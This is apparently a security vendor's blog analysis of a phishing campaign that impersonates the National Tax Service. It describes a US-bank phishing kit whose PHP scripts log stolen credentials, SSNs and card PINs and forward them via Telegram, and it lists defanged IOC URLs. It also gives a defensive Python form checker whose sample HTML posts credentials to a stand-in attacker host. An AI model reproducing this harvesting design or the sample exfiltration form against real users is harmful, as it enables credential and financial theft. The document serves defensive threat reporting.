Phishing Web Server Identified Through an Impostor National Tax Service Email

The ASEC analysis team recently discovered that a phishing email impersonating the National Tax Service was being distributed. This phishing email emphasizes the urgency of the company email password expiring on the same day, and it is being sent with a message urging recipients to extend their password duration before the account is locked.  

Figure 1. Original email

Figure 2. Phishing site for entering account information

Figure 3. Source code of the login page

Clicking the hyperlink attached to the “keep same password” text redirects the user to a page mimicking the company email login page. The HTML source of this page is shown above. As the code shows, the page is built so that the account credentials entered by the user are sent to the threat actor’s server as soon as the login form is submitted.

Figure 4. The threat actor’s server

  • Phishing page URL: hxxps://cloudflare-ipfs[.]com/ipfs/QmRgn9xHYkCoGyj39wQBwfYo7MZ2dtJEh1h9RQ5hcyBqGa?filename=logsinfo.html#[User Email Address]
  • User credentials-leaking URL: hxxps://jy****ud[.]com/service2/online/dollar/sure/logs/gen.php

Users must not only check the authenticity of an email but also verify that the URLs of the linked pages belong to the legitimate domain. Accessing the top-level domain in this case revealed a web server to which component files for phishing had been uploaded.
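One way to automate the check this paragraph asks for, as an added example that is not from the original post: it parses a page’s login form and flags a password form whose action posts to a host outside the legitimate domain, and it also flags the IPFS-gateway hosting and the e-mail address carried in the URL fragment seen in this campaign. The page URL, HTML and domain names below are constructed placeholders, not the real IOCs.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, urljoin

# Constructed sample mirroring the pattern in Figure 3: a gateway-hosted page whose
# login form posts to a third-party host. All hosts here are placeholders.
SAMPLE_PAGE_URL = "https://ipfs-gateway.example/ipfs/QmPLACEHOLDER?filename=logsinfo.html#victim@corp.example"
SAMPLE_HTML = """
<html><body>
<form id="login" method="post" action="https://attacker.example/logs/gen.php">
  <input type="email" name="email"><input type="password" name="pass">
  <input type="submit" value="Keep same password">
</form></body></html>
"""

class FormCollector(HTMLParser):
    """Collect the action URL and whether a password field exists for every <form>."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action", ""), "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if a.get("type", "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def analyze(page_url, html, legit_domain):
    """Return a list of findings for the page; an empty list means nothing suspicious."""
    findings = []
    u = urlparse(page_url)
    if u.path.startswith("/ipfs/"):           # content served through an IPFS gateway
        findings.append("ipfs_gateway_hosted")
    if re.fullmatch(r"[^@\s]+@[^@\s]+\.[^@\s]+", u.fragment):  # victim address pre-filled via #fragment
        findings.append("email_in_fragment")
    parser = FormCollector()
    parser.feed(html)
    for form in parser.forms:
        if not form["password"]:
            continue
        # Resolve relative actions against the page URL, then compare the target host.
        host = urlparse(urljoin(page_url, form["action"])).hostname or ""
        if host != legit_domain and not host.endswith("." + legit_domain):
            findings.append("credential_form_posts_to:" + host)
    return findings
```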

As shown in Figure 4, some files seemed to be used by the threat actor when making various phishing websites. Certain directories had multiple intricately made script files for phishing through impersonating a bank in the US. In particular, the login page was so similar to the actual bank’s web page that ordinary users could not notice the difference upon landing on the fake page.

Figure 5. Files used in the bank web server

Below, we will explain how personal information is transmitted to the attacker through the following pages: (1) the login page made by the threat actor for phishing, (2) the personal information input page, and (3) the card information input page. There are also additional pages, including a user email information input page and a security question page for the email account.

  1. Login Page

Figure 6. Login page

When the user enters their account credentials on the login page, the input is transmitted to darkx/mainnet.php, a script created by the threat actor. As shown in Figure 7, this PHP script receives the account credentials together with the user’s IP address, saves them to a txt file, and then sends the same information over Telegram.

Figure 7. php code linked to the login page

As a result, when the threat actor collects a user’s personal information from each phishing page, the collected information is saved to a txt file with the same name as the web page (see Figure 8). For example, the actual account credentials and IP addresses of users who logged in via login.html were saved to the login.txt file.

Figure 8. Text file where personal information is saved to

Figure 9. The login.txt file containing user account credentials

  2. Personal Details Input Page

Figure 10. Personal details input page

Figure 11. The account_verify.txt file containing detailed personal information

We also found that the information entered on the personal details input page is sent to the threat actor’s PHP page in the same way, and that the threat actor collects it alongside the IP information in a txt file. The personal information collected includes Social Security Numbers (SSN), which play a role similar to Korea’s resident registration number. If such personal information is stolen, the damage is expected to be grave.

  3. Card Information Input Page

Figure 12. Card information input page

Figure 13. The credit_Verify.txt file containing card information

When users enter their information on the card information input page made by the threat actor, the bank customer’s credit card number, card password, and ATM PIN are leaked to the threat actor through the same route.

The threat actor’s server that was recently discovered by the ASEC analysis team not only has a web server that impersonates a bank but also PNG image files used in the login page of a certain corporation and the logo image of a particular web hosting provider of the US. Therefore, it is suspected that the threat actor has made fake phishing websites for these corporate websites as well.

As threat actors are becoming more intricate in impersonating various corporations to deceive users, users must refrain from opening emails from untrusted senders. In particular, due to the characteristics of banking phishing websites, a variety of personal information including sensitive information can be stolen, so extra caution is advised.

[IOC]
hxxps://cloudflare-ipfs[.]com/ipfs/QmRgn9xHYkCoGyj39wQBwfYo7MZ2dtJEh1h9RQ5hcyBqGa?filename=logsinfo.html#
hxxps://jy****ud[.]com/service2/online/dollar/sure/logs/gen.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories: Malware Information

1 Comment
trackback

[…] page were sent to a particular C2, and the address of this C2 is the same domain as that covered in a blog post published in January 2023 about a phishing web server. From this, we can assume that the same threat actor is performing phishing attacks in various […]